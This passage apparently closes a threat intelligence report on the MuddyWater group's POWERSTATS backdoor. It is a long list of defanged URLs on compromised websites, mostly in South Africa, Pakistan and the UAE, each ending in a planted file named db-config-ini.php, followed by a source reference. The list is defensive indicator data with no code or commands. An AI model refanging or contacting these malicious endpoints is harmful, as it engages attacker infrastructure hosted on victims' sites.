hxxp://fccorp.co.za/php/db-config-ini.php
hxxp://www.dws-gov.co.za/wp-admin/db-config-ini.php
hxxp://baksapk.com//db-config-ini.php
hxxp://embali.co.za/php/db-config-ini.php
hxxp://infomate.biz//db-config-ini.php
hxxp://worshipaltar.co.za/components/db-config-ini.php
hxxp://allhandshygiene.co.za//db-config-ini.php
hxxps://www.logicsfort.com/font-awesome/db-config-ini.php
hxxp://www.afikapower.com//db-config-ini.php
hxxp://verifiedseller.co.za/js/db-config-ini.php
hxxp://www.mumtazandbrohi.com/coughingdish/93grahammiller/db-config-ini.php
hxxp://onspotlinks.co.za/upload/db-config-ini.php
hxxp://cdxtrading.co.za//db-config-ini.php
hxxp://vital.com.pk//db-config-ini.php
hxxp://glgroup.co.za/images/db-config-ini.php
hxxp://www.gokhantemiz.com/wp-content/languages/plugins/db-config-ini.php
hxxp://www.triconfabrication.com/wp-admin/db-config-ini.php
hxxp://buboobioinnovations.co.za/wpimages/db-config-ini.php
hxxp://www.galaxyforwarders.com/wp-includes/random_compat/db-config-ini.php
hxxp://www.advcadsys.com/wp-includes/db-config-ini.php
hxxp://thebedspace.com/wp-includes//db-config-ini.php
hxxp://isibaniedu.co.za/admin/db-config-ini.php
hxxp://www.exomi.es/wp-admin/db-config-ini.php
hxxp://dianakleyn.co.za/layouts/db-config-ini.php
hxxp://themotoringcalendar.co.za/wp-includes/db-config-ini.php
hxxp://canbeginsaat.com/madmin/include/db-config-ini.php
hxxp://www.after.vix.br//db-config-ini.php
hxxp://9newshd.com/smf/wp-admin/db-config-ini.php
hxxp://www.gooline.pk/bridge2cart/db-config-ini.php
hxxp://highschoolsuperstar.co.za/files/db-config-ini.php
hxxp://thedailymusicshow.com/wp-admin/db-config-ini.php
hxxp://dubaihelishow.com/tmp/db-config-ini.php
hxxp://cafawelding.co.za/font-awesome/db-config-ini.php
hxxp://www.edesignz.co.za/wp-admin/db-config-ini.php
hxxp://www.buy4you.pk/wp-includes/db-config-ini.php
hxxp://centuryacademy.co.za/css/db-config-ini.php
hxxp://ceramica.co.za//db-config-ini.php
hxxp://airtronuae.com//db-config-ini.php
hxxp://mediaology.com.pk/wp-includes/db-config-ini.php
hxxp://eastrandmotorlab.co.za/fleet/db-config-ini.php
hxxp://stevegardens.co.za/php/db-config-ini.php
hxxp://www.mikimaths.com/wp-admin/db-config-ini.php
hxxp://hjb-racing.co.za/htdocs/db-config-ini.php
hxxp://www.smartoools.co.za//db-config-ini.php
hxxp://vhuenilodge.co.za/php/db-config-ini.php
hxxp://wavecafe.co.za//db-config-ini.php
hxxp://tuules.com//db-config-ini.php
hxxp://www.wmcpk.org/wp/wp-includes/db-config-ini.php
hxxp://www.zamilindustrial.com/akib/db-config-ini.php
hxxp://www.iancullen.co.za//db-config-ini.php
hxxp://anythingispossible.world/wp-includes/db-config-ini.php
hxxp://jeanetteproperties.co.za//db-config-ini.php
hxxp://tradernox.com/wp-includes/widgets/db-config-ini.php
hxxp://weinvest.co.za//db-config-ini.php
hxxp://blackgoldoilserv.com//db-config-ini.php
hxxp://www.rejoicetheatre.com//db-config-ini.php
hxxp://capitalexchange.ae/capital_files/db-config-ini.php
hxxp://dummy.celerosnetworks.com/wp-content/plugins/duplicate-page/db-config-ini.php
hxxp://dpscdgkhan.edu.pk/shopping/db-config-ini.php
hxxp://edgeforensic.co.za//db-config-ini.php
hxxp://willpowerpos.co.za//db-config-ini.php
hxxp://ramzcapital.com//db-config-ini.php
hxxp://www.alshohub.org/NewsLetter/db-config-ini.php
hxxp://colenesphotography.co.za/administrator/db-config-ini.php
hxxp://ecology.haglerbailly.com.pk//db-config-ini.php
hxxp://www.theguitarstudio.co.za//db-config-ini.php
hxxp://softwarehub.co.za/layouts/db-config-ini.php
hxxp://fbrvolume.co.za//db-config-ini.php
hxxp://risabaattorneys.com//db-config-ini.php
hxxp://dubaigip.com//db-config-ini.php
hxxp://www.bbconlinenetwork.com/wp-includes/db-config-ini.php
hxxp://panfam.co.za//db-config-ini.php
hxxp://reatlegile.com/upload/db-config-ini.php
hxxp://www.khotsonglodge.co.ls/wp-admin/db-config-ini.php
hxxp://www.goolineb2b.com/wp-includes/db-config-ini.php
hxxp://erniecommunications.co.za/css/db-config-ini.php
hxxp://salmanandassociates.com.pk//db-config-ini.php
hxxp://promechtransport.co.za/include/db-config-ini.php
hxxp://rightwayfoundationpk.org/wp-admin/db-config-ini.php
hxxp://centuriongsd.co.za//db-config-ini.php
hxxp://delcom.co.za//db-config-ini.php
hxxp://www.andrebruton.com//db-config-ini.php
hxxp://h-dubepromotions.co.za//db-config-ini.php
hxxp://ambientmoon.co.za//db-config-ini.php
hxxp://www.ultrapexsustainable.org.za//db-config-ini.php
hxxp://crystaltidings.co.za//db-config-ini.php
hxxp://diegemmerkat.co.za/wp-includes/db-config-ini.php
hxxp://funisalodge.co.za/data1/db-config-ini.php
hxxp://arabaemlak.com/magaza/cgi-bin/db-config-ini.php
hxxps://eurospa.ae/wp-includes/db-config-ini.php
hxxp://experttutors.co.za//db-config-ini.php
hxxps://www.cartridgecave.co.za/wp-admin/db-config-ini.php
hxxp://ecs-consult.com/components/db-config-ini.php
hxxp://oftheearthphotography.com/www/db-config-ini.php
hxxp://hmholdings360.co.za/wp-admin/db-config-ini.php
hxxp://joyngroup.com//db-config-ini.php
hxxp://hybridauto.co.za/photography/db-config-ini.php
hxxp://www.vhupo-tours.com/wp-includes/db-config-ini.php
hxxp://seoinlahorepakistan.com/clockwork/db-config-ini.php
hxxp://africanpixels.zar.cc/includes/db-config-ini.php
hxxp://doggypetstore.com//db-config-ini.php
hxxp://adambaluch.ae/wp-includes/Requests/Utility/db-config-ini.php
hxxp://ryanchristiefurniture.co.za//db-config-ini.php
hxxp://evansmokaba.com/evansmokaba.com/thabiso/db-config-ini.php
hxxps://afrikitti.com//db-config-ini.php
hxxp://www.fun4kidz.co.za//db-config-ini.php
hxxp://www.infratechconsulting.com//db-config-ini.php
hxxp://www.snackattack.co.za//db-config-ini.php
hxxp://www.proplumbing.co.za/wp-admin/db-config-ini.php
hxxp://sipambi-projects.co.za//db-config-ini.php
hxxp://solartree.pk//db-config-ini.php
hxxp://charliewestsecurity.co.za//db-config-ini.php
hxxps://zasamag.com/wp-includes/db-config-ini.php
hxxp://superdelight.co.za/livezilla/db-config-ini.php
hxxp://www.execwash.ae//db-config-ini.php
hxxp://moonsteel.ae//wp-content/themes/twentyfifteen/genericons/db-config-ini.php
hxxp://www.waterforevents.co.za//db-config-ini.php
hxxp://servicebox.co.za//db-config-ini.php
hxxp://globalelectricalandconstruction.co.za/wpscripts/db-config-ini.php
hxxp://skyblueprint.co.za/scripts/db-config-ini.php
hxxp://www.sowetojive.co.za//db-config-ini.php
hxxp://ushostinc.com/Slider/db-config-ini.php
hxxps://alceharfield.com//db-config-ini.php
hxxp://indocraft.co.za/test/db-config-ini.php
hxxps://awebcommerce.com/wp-admin/db-config-ini.php
hxxp://w1africa.co/crmsugar/db-config-ini.php
hxxp://sullivanprimary.co.za/wp-admin/db-config-ini.php
hxxp://www.rcpk.co.za//db-config-ini.php
hxxp://jakobieducation.co.za//db-config-ini.php
hxxp://globaltransformers.com/wp-admin/db-config-ini.php
hxxp://abvsecurity.co.za//db-config-ini.php
hxxp://tlcservers.co.za//db-config-ini.php
hxxp://pamudzi.co.za/wp-includes/db-config-ini.php
hxxp://shullen.co.za//db-config-ini.php
hxxp://www.daleth.co.za/wp-includes/db-config-ini.php
hxxp://opendisclosure.org.za//db-config-ini.php
hxxp://winagainstebola.com/assets/db-config-ini.php
hxxp://permanite.co.za/wp-includes/db-config-ini.php
hxxp://onlinenews.com.pk//db-config-ini.php
hxxp://afrogeo.com/afroweb/db-config-ini.php
hxxp://reniko.co.za/wp-admin/db-config-ini.php
hxxp://bm360.com.pk//db-config-ini.php
hxxp://tawaair.com//db-config-ini.php
hxxp://ancoeng.co.za//db-config-ini.php
hxxp://irfanandirfan.com/irfanadnirfan/db-config-ini.php
hxxp://www.peoplealley.com/wp-admin/db-config-ini.php
hxxp://lahorecoolingtower.com//db-config-ini.php
hxxp://debnoch.com/image/db-config-ini.php
hxxp://gideonitesprojects.com//db-config-ini.php
hxxp://threelivingprojects.co.za//db-config-ini.php
hxxp://twinnovations.co.za/wp-includes/db-config-ini.php
hxxp://woodracefurniture.co.za/js/db-config-ini.php
hxxp://www.koshcreative.co.uk/wp-includes/db-config-ini.php
hxxps://www.3dremodel.com//db-config-ini.php
hxxp://iinvest4u.co.za/wp-includes/db-config-ini.php
hxxp://burgercoetzeeattorneys.co.za//db-config-ini.php
hxxp://h-u-i.co.za/heiren/db-config-ini.php
hxxp://insta-art.co.za//db-config-ini.php
hxxp://twickenhamsa.co.za/wp-includes/db-config-ini.php
hxxp://firstchoiceproperties.co.za//db-config-ini.php
hxxp://sikanderajam.com//db-config-ini.php
hxxp://muallematsela.com/wp-admin/db-config-ini.php
hxxp://pronette.co.za/images/db-config-ini.php
hxxp://sheqworld.co.za/js/db-config-ini.php
hxxp://slcmprojects.co.za/phpMailer/db-config-ini.php
hxxp://www.geotrading.ae//db-config-ini.php
hxxp://nbscorporation.co.za//db-config-ini.php
hxxps://www.bizxess.com//db-config-ini.php
hxxp://perfectlabels.net//db-config-ini.php
hxxp://susinternational.com//db-config-ini.php
hxxp://www.obaidsaqerbusit.com//db-config-ini.php
hxxps://www.aboserver.xyz/wp-includes/db-config-ini.php
hxxp://www.bestdecorativemirrors.com/More-Mirrors/db-config-ini.php
hxxp://www.m-3.co.za/wp-includes/db-config-ini.php
hxxp://beesrenovations.co.za/images/db-config-ini.php
hxxp://sefukaletrading.co.za/wpscripts/db-config-ini.php
hxxp://hellohealthy.pro/wp-includes/widgets/db-config-ini.php
hxxp://nrsp.org.pk/publications/db-config-ini.php
hxxp://paimantrust.org/wp-content/plugins/contact-form-7/includes/db-config-ini.php
hxxp://mokorotlocorporate.com//db-config-ini.php
hxxp://aeconafrica.com//db-config-ini.php
hxxp://alvesajewellery.com//db-config-ini.php
hxxp://in2accounting.co.za//db-config-ini.php
hxxp://rvnstudios.co.za/specials/db-config-ini.php
hxxp://chitchatdosti.com/wp-content/db-config-ini.php
hxxp://domusgroup.ae/wp-admin/db-config-ini.php
hxxp://elektroniksigaralab.com/wp-includes/db-config-ini.php
hxxp://www.alphapridesafaris.com//db-config-ini.php
hxxp://giginsulation.com/new/db-config-ini.php
hxxp://reesconsulting.co.za/wpimages/db-config-ini.php
hxxp://ntombizenhloso.co.za//db-config-ini.php
hxxp://thealtarofworship.co.za//db-config-ini.php
hxxp://cloudhub.co.ls/modules/db-config-ini.php
hxxp://www.olexco.ae/wp/db-config-ini.php
hxxp://ftu965.com/wp-includes/theme-compat/db-config-ini.php
hxxp://digital-cameras-south-africa.co.za/Templates/db-config-ini.php
hxxp://uptown-trading.zar.cc/ana/db-config-ini.php
hxxp://satwa.ae/wp-includes/Requests/db-config-ini.php
hxxp://satcomputers.co.za//db-config-ini.php
hxxp://boschxpress.com//db-config-ini.php
hxxp://hosthof.pk/customer/db-config-ini.php
hxxp://newtech-consulting.ae/templates/db-config-ini.php
hxxps://www.engeltjieakademie.co.za/wp-admin/db-config-ini.php
hxxp://juniorad.co.za/vendor/db-config-ini.php
hxxp://dryve.ae//db-config-ini.php
hxxp://2strongmagazine.co.za//db-config-ini.php
hxxp://binhamgroup.com/event/db-config-ini.php
hxxp://www.centreforgovernance.uk//db-config-ini.php
hxxp://bepovoblago.com//db-config-ini.php
hxxp://isgs.com.pk//db-config-ini.php
hxxp://balaateen.co.za/less/db-config-ini.php
hxxp://www.babypk.net/wp-admin/includes/db-config-ini.php
hxxp://labas-health.apps.ae/wp-content/themes/twentyfourteen/db-config-ini.php
hxxp://bntlaminates.com//db-config-ini.php
hxxp://serversvalley.com//db-config-ini.php
hxxp://courtesydriving.co.za/js/db-config-ini.php
hxxp://prommap.co.za//db-config-ini.php
hxxp://narcolepsy-symptom-treatment.org//db-config-ini.php
hxxps://zafarstocks.com/wp-includes/db-config-ini.php
hxxp://www.freshhub.ae/var/db-config-ini.php
hxxp://www.icsswaziland.com//db-config-ini.php
hxxp://askarisecurities.com.pk//db-config-ini.php
hxxp://funeralbusinesssolution.com/email_template/db-config-ini.php
hxxp://intellismartglobal.com/public_html/db-config-ini.php
hxxp://thelawyerscanvas.pk/wp-admin/db-config-ini.php
hxxp://sirketcv.com/css/dist/loop/db-config-ini.php
hxxps://3dprintingdubai.ae//db-config-ini.php
hxxp://symergy.co.za/wp-admin/db-config-ini.php
hxxp://hostingvalley.co.uk/downloads/db-config-ini.php
hxxp://haveytv.com//db-config-ini.php
hxxp://officialdivinea.com//db-config-ini.php
hxxp://www.ampleadminservices.com/wp-includes/db-config-ini.php
hxxp://www.ihlosiqs-pm.co.za//db-config-ini.php
hxxp://mtinetworkdubai.com//db-config-ini.php
hxxps://boilersinfo.com/wp-includes/db-config-ini.php
hxxp://aresebetseng.co.za/wp-includes/db-config-ini.php
hxxp://aleph.pk/administrator/modules/mod_menu/db-config-ini.php
hxxp://www.moboradar.com/wp-includes/db-config-ini.php
hxxp://blackthorn.co.za//db-config-ini.php
hxxp://tmkprojects.co.za//db-config-ini.php
hxxp://alaqaba.com//db-config-ini.php
hxxp://www.qsrimages.co.za/wp-admin/db-config-ini.php
hxxp://tamer.info/dle/engine/ajax/db-config-ini.php
hxxp://getabletravel.co.za/data1/db-config-ini.php
hxxps://quickauto.tools/wp-admin/db-config-ini.php
hxxp://printernet.co.za//db-config-ini.php
hxxp://get-paid-for-online-survey.com//db-config-ini.php
hxxp://abrahamseed.co.za/scripts/db-config-ini.php
hxxp://cybercraft.biz/AB/db-config-ini.php
hxxp://www.competitiveedoptions.com//db-config-ini.php
hxxp://www.humorcarbons.com/wp-includes/db-config-ini.php
hxxps://carepvtltdpk.com/index_videolb/thumbnails/db-config-ini.php
hxxp://intelligentprotection.co.za/wp-admin/db-config-ini.php
hxxp://lppaportal.org.ls/dist/db-config-ini.php
hxxp://satuwrite.com//db-config-ini.php
hxxp://orsiniconsulting.co.za/newsite/db-config-ini.php
hxxp://www.themusicstudio.co.za/wp-includes/db-config-ini.php
hxxp://incoso.co.za/images/db-config-ini.php
hxxp://aboutbodybuildingworkout.com//db-config-ini.php
hxxp://webhostinc.net//db-config-ini.php
hxxp://bitteeth.com/docbank/db-config-ini.php
hxxp://www.superlead.org/wp-includes/db-config-ini.php
hxxp://technicians.global//db-config-ini.php
hxxp://isound.co.za/wp-admin/db-config-ini.php
hxxps://www.pacificprime.ae//db-config-ini.php
hxxp://tandemtraining.co.za//db-config-ini.php
hxxp://aexergy.com//db-config-ini.php
hxxp://adriaanvorster.co.za/engines/db-config-ini.php
hxxp://www.gsmmid.com/wp-admin/db-config-ini.php
hxxp://24newstube.com/satu/db-config-ini.php
hxxp://goolinegaming.com//db-config-ini.php
hxxp://hisandherskennels.co.za/assets/sass/db-config-ini.php
hxxp://empowerbridge.com/projects/abianasystem/db-config-ini.php
hxxp://www.wdsc.co.za/wp-includes/db-config-ini.php
hxxp://projectartdivvy.com/wp-admin/maint/db-config-ini.php
hxxp://iqra.co.za/admin/db-config-ini.php
hxxp://thecompasssolutions.co.za//db-config-ini.php
hxxp://mailingservers.net//db-config-ini.php
hxxps://rstextilesourcing.com//db-config-ini.php
hxxp://quikteam.com/scripts/contrib/db-config-ini.php
hxxp://iggleconsulting.com//db-config-ini.php
hxxp://astrumtechnologies.co.za/templates/db-config-ini.php
hxxp://cupboardcure.co.za/vendor/db-config-ini.php
hxxp://www.blockdos.net/wp-admin/db-config-ini.php
hxxps://bednbreakfasthotel.com/wp-includes/db-config-ini.php
hxxp://broken-arrow.co.za//db-config-ini.php
hxxps://mayoorschoolabudhabi.com//db-config-ini.php
hxxp://www.goolinespace.com//db-config-ini.php
hxxp://www.simpleks.co.za/wp-includes/db-config-ini.php
hxxp://abanganifunerals.co.za/fonts/db-config-ini.php
hxxp://technics.pk/info/db-config-ini.php
hxxp://www.bhakkarrishtey.com//db-config-ini.php
hxxp://arabelaholdings.com/wpscripts/db-config-ini.php
hxxp://bestencouragementwords.com//db-config-ini.php
hxxp://myhealthmedical.ae//old/PHPMailer/extras/db-config-ini.php
hxxp://sjog.mw//db-config-ini.php
hxxp://www.phoenix.zar.cc/wp-includes/db-config-ini.php
hxxp://www.induworld.ae/wp-admin/db-config-ini.php
hxxp://legacybeautysalon.com/wp-content/plugins/contact-form-7/includes/db-config-ini.php
hxxp://prestbusiness.co.za//db-config-ini.php
hxxp://habibtextiles.pk/wp-admin/db-config-ini.php
hxxp://fsproperties.co.za/engine1/db-config-ini.php
hxxps://www.brandspeak.org/contact/include/db-config-ini.php
hxxp://bridgepakistan.org//db-config-ini.php
hxxp://realstar.co.za//db-config-ini.php
hxxp://www.afikagroup.com/wp-includes/db-config-ini.php
hxxp://molepetravel.co.ls/data1/db-config-ini.php
hxxp://iiee.edu.pk//db-config-ini.php
hxxp://cmhts.co.za/resources/db-config-ini.php
hxxp://www.organisejournalise.co.za//db-config-ini.php
hxxp://www.arabblower.com//db-config-ini.php
hxxp://cns.com.pk/wp-includes/theme-compat/db-config-ini.php
hxxp://domesticguardians.co.za/Banner/db-config-ini.php
hxxp://stubbornsystems.com//db-config-ini.php
hxxp://ahdaaf.ae/wp-admin/db-config-ini.php
hxxp://cazochem.co.za/cazochem/db-config-ini.php
hxxp://www.algom-law.com//db-config-ini.php
References
[1] https://ti.qianxin.com/apt/detail/5b0d2e66596a10001cde7c79?name=MuddyWater&type=map
Originally published on the WeChat official account of the Qi An Xin Threat Intelligence Center: "In-depth analysis of the MuddyWater arsenal: the POWERSTATS backdoor".